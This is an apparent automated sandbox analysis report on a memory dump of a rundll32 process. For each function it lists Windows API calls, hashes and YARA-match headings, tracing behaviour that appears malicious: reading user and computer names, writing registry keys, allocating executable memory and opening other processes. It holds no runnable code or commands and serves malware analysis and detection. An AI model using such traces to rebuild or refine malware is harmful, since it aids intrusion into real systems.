                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                          • String ID:
                          • API String ID: 2864405449-0
                          • Opcode ID: f9fd1b56aa5b2e7b202405dd030a378d805adad29e090b0caf7c04e81eb6ef18
                          • Instruction ID: 4afb5a05e13662c1ae23f1fa774cad6dfbf487f0a2615acfa325da57c3e83ae0
                          • Opcode Fuzzy Hash: f9fd1b56aa5b2e7b202405dd030a378d805adad29e090b0caf7c04e81eb6ef18
                          • Instruction Fuzzy Hash: 6B314171900208BFEB209FA9EC4ABBE7FBAFF04325F204195F911A61D0D774AA54DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B8068D Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,05B65674,00000008,?,00000010,00000001,00000000,0000003A), ref: 05B806AC
                          • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 05B806E0
                          • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 05B806E8
                          • GetLastError.KERNEL32 ref: 05B806F2
                          • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 05B8070E
                          • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 05B80727
                          • CancelIo.KERNEL32(?), ref: 05B8073C
                          • CloseHandle.KERNEL32(?), ref: 05B8074C
                          • GetLastError.KERNEL32 ref: 05B80754
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                          • String ID:
                          • API String ID: 4263211335-0
                          • Opcode ID: c037bcd5268ffb22acf1f67a8c488c9b59493c3f45ccb9038542f42953789f7b
                          • Instruction ID: bcf5ba3f703361a0dc4f02d06d8c2d78c8375455e1b5750a3cfe5800c88fdf1f
                          • Opcode Fuzzy Hash: c037bcd5268ffb22acf1f67a8c488c9b59493c3f45ccb9038542f42953789f7b
                          • Instruction Fuzzy Hash: 77211976910218BFCB11BFA5D88D9FE7B7AFB44350B109062F916D6180DB70AA58CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B71C19 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,05B6E231,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B71C25
                          • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 05B71C3B
                          • _snwprintf.NTDLL ref: 05B71C60
                          • CreateFileMappingW.KERNEL32(000000FF,05B8A1E8,00000004,00000000,00001000,?), ref: 05B71C7C
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05B71C8E
                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 05B71CA5
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 05B71CC6
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05B71CCE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                          • String ID:
                          • API String ID: 1814172918-0
                          • Opcode ID: 1c2ece6d59aadc98647810ee12e35c14698116d99f1f367eb89339d80bcf22de
                          • Instruction ID: a0e3479f24a72f74c7fce7f214f70e55061850b692b9f50d2f9822cca5b85cb7
                          • Opcode Fuzzy Hash: 1c2ece6d59aadc98647810ee12e35c14698116d99f1f367eb89339d80bcf22de
                          • Instruction Fuzzy Hash: ED21A876640208BBD721EFA8CC06FAD7BBABB44750F254061F615EB2C0EA70F505D760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7CB5A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(00000000,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?,00000000,00000000,00000000), ref: 05B7CC58
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B7CC7B
                          • lstrcatW.KERNEL32(00000000,00000000), ref: 05B7CC83
                          • lstrlenW.KERNEL32(00000000,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?,?,05FB9A2B,?), ref: 05B7CCCE
                          • memcpy.NTDLL(00000000,?,?,?), ref: 05B7CD36
                          • LocalFree.KERNEL32(?,?), ref: 05B7CD4F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                          • String ID: P
                          • API String ID: 3649579052-3110715001
                          • Opcode ID: c96ccf8c08bbc3e69495fcb29c150222293d76b4fc23260c7e5eb8e7108f9232
                          • Instruction ID: f833d5e4fe9237b3194ea02a922adc56ffaffa7cbd0419326c7042b076747f03
                          • Opcode Fuzzy Hash: c96ccf8c08bbc3e69495fcb29c150222293d76b4fc23260c7e5eb8e7108f9232
                          • Instruction Fuzzy Hash: 20611B71A0010EAFCF10EFA4D88A9BE7FBAFB45614B155069F515A7250EB34BE05CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7C563 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B8148E: InterlockedIncrement.KERNEL32(00000018), ref: 05B814DF
                            • Part of subcall function 05B8148E: RtlLeaveCriticalSection.NTDLL(05FBC398), ref: 05B8156A
                          • OpenProcess.KERNEL32(00000410,B8F475FF,05B72289,00000000,00000000,05B72289,0000001C,00000000,00000000,?,?,?,05B72289), ref: 05B7C5BD
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,05B72299,00000104,?,?,?,05B72289), ref: 05B7C5DB
                          • GetSystemTimeAsFileTime.KERNEL32(05B72289), ref: 05B7C643
                          • lstrlenW.KERNEL32(C78BC933), ref: 05B7C6B8
                          • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 05B7C6D4
                          • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 05B7C6EC
                            • Part of subcall function 05B6F307: RtlLeaveCriticalSection.NTDLL(?), ref: 05B6F384
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                          • String ID: o
                          • API String ID: 2541713525-252678980
                          • Opcode ID: f2578f1401948940ae2eaae36e7fa6d98e250dbcbde9d169e57267cd6624fed9
                          • Instruction ID: ac2aed8f89e2eff68d1af4641ed459fa2bc9c8f678640348051d3a637bc73314
                          • Opcode Fuzzy Hash: f2578f1401948940ae2eaae36e7fa6d98e250dbcbde9d169e57267cd6624fed9
                          • Instruction Fuzzy Hash: E551BE7161060AABDB20DF64D889BBABBA9FF08700F1015A9E516D7240EB74FD80CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6A316 Relevance: 12.2, APIs: 8, Instructions: 209timeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 05B6A391
                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05B6A3BD
                          • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 05B6A3CD
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 05B6A405
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 05B6A427
                          • GetShellWindow.USER32 ref: 05B6A436
                            • Part of subcall function 05B72986: GetShellWindow.USER32 ref: 05B729A4
                            • Part of subcall function 05B72986: GetVersion.KERNEL32 ref: 05B72A46
                            • Part of subcall function 05B72986: GetVersion.KERNEL32 ref: 05B72A54
                          • GetLastError.KERNEL32(?), ref: 05B6A521
                          • CloseHandle.KERNEL32(?), ref: 05B6A535
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                          • String ID:
                          • API String ID: 2436285880-0
                          • Opcode ID: 684a04dba60dd7019a0bee4c9ce60210a0a69a96164a6f0a2618dd57de21b62e
                          • Instruction ID: 0b698b1fe0fdf63794fe2427189b6bbb33ebaf1cf44486237423f568dccc92c6
                          • Opcode Fuzzy Hash: 684a04dba60dd7019a0bee4c9ce60210a0a69a96164a6f0a2618dd57de21b62e
                          • Instruction Fuzzy Hash: BE7147B1508305EFCB10EF64C888D6BBBE9FB88254F104A6EF595E3290D734E945CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B67A61 Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7B7A4: RegCreateKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7B9
                            • Part of subcall function 05B7B7A4: lstrlen.KERNEL32(05FBB7F0,00000000,00000000,00000000,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008,00000003), ref: 05B7B7E2
                          • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05B67AA6
                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05B67ABE
                          • HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67B20
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B67B34
                          • WaitForSingleObject.KERNEL32(00000000,?,05B787CC,?,?), ref: 05B67B86
                          • HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67BAF
                          • HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67BBF
                          • RegCloseKey.ADVAPI32(?,?,05B787CC,?,?), ref: 05B67BC8
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                          • String ID:
                          • API String ID: 3503961013-0
                          • Opcode ID: dcfd79a394bab74c8994028292d310048fd1e82a8706810e493b2b32d0aa4885
                          • Instruction ID: 23de35573e45e202f71a9c07a69bcc623f488d42d54299ce032a1bfc84b3ab05
                          • Opcode Fuzzy Hash: dcfd79a394bab74c8994028292d310048fd1e82a8706810e493b2b32d0aa4885
                          • Instruction Fuzzy Hash: B341B5B5D10119FFDF119FA4C8858FEBF7AFF08218F1444AAF515A2210DA39AA94EF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6AAAF Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,05B6A1A1), ref: 05B6AAC5
                          • wsprintfA.USER32 ref: 05B6AAED
                          • lstrlen.KERNEL32(?), ref: 05B6AAFC
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • wsprintfA.USER32 ref: 05B6AB3C
                          • wsprintfA.USER32 ref: 05B6AB71
                          • memcpy.NTDLL(00000000,?,?), ref: 05B6AB7E
                          • memcpy.NTDLL(00000008,05B853E8,00000002,00000000,?,?), ref: 05B6AB93
                          • wsprintfA.USER32 ref: 05B6ABB6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                          • String ID:
                          • API String ID: 2937943280-0
                          • Opcode ID: ae943b3d544bed56733d9ac223921c10d1440805a7d5a5943a9f92af99ae2cb8
                          • Instruction ID: 4456f767ec71de9cef8f8b2a381779dad29b5ab294de6987fe10725887d1873a
                          • Opcode Fuzzy Hash: ae943b3d544bed56733d9ac223921c10d1440805a7d5a5943a9f92af99ae2cb8
                          • Instruction Fuzzy Hash: 00410A71A00209EFDB14EFA8D885EAAB7FDEF44208B144495F919E7251EA34FA05CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B816C6 Relevance: 12.1, APIs: 8, Instructions: 98memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 05B816F0
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81703
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 05B81715
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,05B76C8E), ref: 05B81739
                          • GetComputerNameW.KERNEL32(00000000,?), ref: 05B81747
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B8175E
                          • GetComputerNameW.KERNEL32(00000000,?), ref: 05B8176F
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,05B76C8E), ref: 05B81795
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapName$AllocateComputerFreeUser
                          • String ID:
                          • API String ID: 3239747167-0
                          • Opcode ID: 87268e253d83c6bffa8dd6f25c613479b14f5c7622aa38cd0ecc18baa3be6f23
                          • Instruction ID: fa9959043beb28ce0352d7d715798cadb660562dba30948ce50e85e4e59bf239
                          • Opcode Fuzzy Hash: 87268e253d83c6bffa8dd6f25c613479b14f5c7622aa38cd0ecc18baa3be6f23
                          • Instruction Fuzzy Hash: C931E9B6A10109AFDB10EFB8D9858BEBBFAFB44254B109469E905D7200DB34FA45DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B763D1 Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?), ref: 05B763F5
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B76407
                          • wcstombs.NTDLL ref: 05B76415
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?), ref: 05B76439
                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05B7644E
                          • mbstowcs.NTDLL ref: 05B7645B
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?,?), ref: 05B7646D
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?,?), ref: 05B76487
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                          • String ID:
                          • API String ID: 316328430-0
                          • Opcode ID: 43418909f7157591df3c97acdfc77b66ffe3e8744fc588b73c64b708187622fb
                          • Instruction ID: f9b1fcafa607e497aa21eed707b39a1d7e83e18000ec9b68dbb727a057e39597
                          • Opcode Fuzzy Hash: 43418909f7157591df3c97acdfc77b66ffe3e8744fc588b73c64b708187622fb
                          • Instruction Fuzzy Hash: D121503151020AFFDF219FA4DC0AEAE7FBAFB44314F104165F615A60A0DB71E964EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6D922 Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(05B7E453,00000000,00000000,05B8A440,?,?,05B6F68B,05B7E453,00000000,05B7E453,05B8A420), ref: 05B6D935
                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05B6D943
                          • wsprintfA.USER32 ref: 05B6D95F
                          • RegCreateKeyA.ADVAPI32(80000001,05B8A420,00000000), ref: 05B6D977
                          • lstrlen.KERNEL32(?), ref: 05B6D986
                          • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 05B6D994
                          • RegCloseKey.ADVAPI32(?), ref: 05B6D99F
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6D9AE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                          • String ID:
                          • API String ID: 1575615994-0
                          • Opcode ID: 246f91293853e62ef4f8b2737c98cff0157a52ae5b8c2f23e133414c1aed34c8
                          • Instruction ID: 97d6ef71cc8f7c591f5b14a3262dace79e5910aad8656703dacab0721cc32d68
                          • Opcode Fuzzy Hash: 246f91293853e62ef4f8b2737c98cff0157a52ae5b8c2f23e133414c1aed34c8
                          • Instruction Fuzzy Hash: D8111B32210108BFEF115B94EC4AEBA3F7EEB49754F145021FA0597150DA71BD54EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7FE06 Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000040,00000000,?), ref: 05B7FE12
                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B7FE30
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B7FE38
                          • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 05B7FE56
                          • GetLastError.KERNEL32 ref: 05B7FE6A
                          • RegCloseKey.ADVAPI32(?), ref: 05B7FE75
                          • CloseHandle.KERNEL32(00000000), ref: 05B7FE7C
                          • GetLastError.KERNEL32 ref: 05B7FE84
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                          • String ID:
                          • API String ID: 3822162776-0
                          • Opcode ID: c00ca34a84c106f1db302fef6e9e7b5917b625ad31c28e88655bd533a9f366d0
                          • Instruction ID: 5197f9616a7d006f462771d68744fb72cfeb768d0f916d6a7af8afbb63eec8af
                          • Opcode Fuzzy Hash: c00ca34a84c106f1db302fef6e9e7b5917b625ad31c28e88655bd533a9f366d0
                          • Instruction Fuzzy Hash: 54115B76150208BFDB119FA4D849ABA3F6AFB48661F146020FA16C6281DF31E954CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6941B Relevance: 11.5, APIs: 9, Instructions: 298COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: b82f4508ca462c08fe032bde3792c65daf0c50d760bbb2eddcee7be4d6da9e85
                          • Instruction ID: cdf4764f512aece46d77e3b2f80f92e1b43aff1693e67ce0382226448e8069da
                          • Opcode Fuzzy Hash: b82f4508ca462c08fe032bde3792c65daf0c50d760bbb2eddcee7be4d6da9e85
                          • Instruction Fuzzy Hash: ACB10F71D00219EFDF21EFA4C948ABEBBBAFF05314F1440A1E911B7260D739AA44DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B823FD Relevance: 11.5, APIs: 9, Instructions: 296COMMON
                          Download Yara Rule
                          APIs
                          • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,05B82801,?), ref: 05B8242E
                          • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 05B8243B
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,05B82801,00000000,00000001,?,?,?,?,05B82801,?,00000000), ref: 05B825C9
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy$AllocateHeap
                          • String ID:
                          • API String ID: 4068229299-0
                          • Opcode ID: f4370e48c59eeed51cfaa5eea3ed8961160a10b6b943c2995366334bae2771dc
                          • Instruction ID: 3549802bbf2fe01a20d10530a9804552f4793e4bc81ef0110dc4cfec95878bd9
                          • Opcode Fuzzy Hash: f4370e48c59eeed51cfaa5eea3ed8961160a10b6b943c2995366334bae2771dc
                          • Instruction Fuzzy Hash: BCB12D7960020AABDF11EF95CD84EFEBBA9FF04200F1451A5F915AB250EB34FA15CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6BA6B Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCommandLineA.KERNEL32(05B860F0,00000038,05B6E22A,00000000,76CDF5B0,05B70348,?,00000001,?,?,?,?,?,?,?,05B69100), ref: 05B6BA7C
                          • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B6BA8D
                            • Part of subcall function 05B6D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,05B6DA7B,?), ref: 05B6D4E3
                            • Part of subcall function 05B6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 05B6D506
                            • Part of subcall function 05B6D4DA: memset.NTDLL ref: 05B6D515
                          • ExitProcess.KERNEL32 ref: 05B6BC6F
                            • Part of subcall function 05B6A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,05FBC304,00000000,?,05B66584,?), ref: 05B6A90E
                            • Part of subcall function 05B6A8E9: StrTrimA.SHLWAPI(00000020,05B85FCC,00000000,?,05B66584,?), ref: 05B6A92D
                            • Part of subcall function 05B6A8E9: StrChrA.SHLWAPI(00000020,?,?,05B66584,?), ref: 05B6A939
                          • lstrcmp.KERNEL32(?,?), ref: 05B6BAFB
                          • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,05B69100,?), ref: 05B6BB13
                            • Part of subcall function 05B64BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,05FBB7F0,?,?,05B7B7F2,0000003A,05FBB7F0,?,05B7A2EB,00000001,?,00000000,00000000), ref: 05B64C04
                            • Part of subcall function 05B64BC4: CloseHandle.KERNEL32(000000FF,?,?,05B7B7F2,0000003A,05FBB7F0,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C), ref: 05B64C0F
                          • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,05B69100,?), ref: 05B6BB85
                          • lstrcmp.KERNEL32(?,?), ref: 05B6BB9E
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                          • String ID:
                          • API String ID: 739714153-0
                          • Opcode ID: c8ec70eb1fe54d92bd6e7f5876206747d96be62e8598d1d0f77e26a44f89f8f2
                          • Instruction ID: 3c46796424307c3ec738f5a56d4c5b271f451fde16a861bde21b262aa0a4d365
                          • Opcode Fuzzy Hash: c8ec70eb1fe54d92bd6e7f5876206747d96be62e8598d1d0f77e26a44f89f8f2
                          • Instruction Fuzzy Hash: FB511B71A10219AFDF21ABA4CC99DBEBBBAFF09700F1444A5F101E6154DB39B941CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7948C Relevance: 10.6, APIs: 7, Instructions: 138memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 05B794B7
                          • StrTrimA.SHLWAPI(00000000,?), ref: 05B794D4
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B79507
                          • RtlImageNtHeader.NTDLL(00000000), ref: 05B79532
                          • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 05B795F7
                            • Part of subcall function 05B6D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,05B6DA7B,?), ref: 05B6D4E3
                            • Part of subcall function 05B6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 05B6D506
                            • Part of subcall function 05B6D4DA: memset.NTDLL ref: 05B6D515
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 05B795A8
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 05B795D7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                          • String ID:
                          • API String ID: 239510280-0
                          • Opcode ID: 1d3d7aee2fbaa9b237ab845c9704cfed2fc7e8774c6da09003be111e836c0dcc
                          • Instruction ID: ce604a9498158913cb7ab8b958d386b5ae5e6dbf49cc1d8655779291f91b8d22
                          • Opcode Fuzzy Hash: 1d3d7aee2fbaa9b237ab845c9704cfed2fc7e8774c6da09003be111e836c0dcc
                          • Instruction Fuzzy Hash: 6D41B131704219BFDB229B94CC89FBE7FAAEF44750F1000A5FA15AB280DB75BA45D790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7D698 Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D6F2
                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D710
                          • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 05B7D73C
                          • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D753
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7D766
                          • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D775
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?), ref: 05B7D7D9
                            • Part of subcall function 05B6F307: RtlLeaveCriticalSection.NTDLL(?), ref: 05B6F384
                          Memory Dump Source
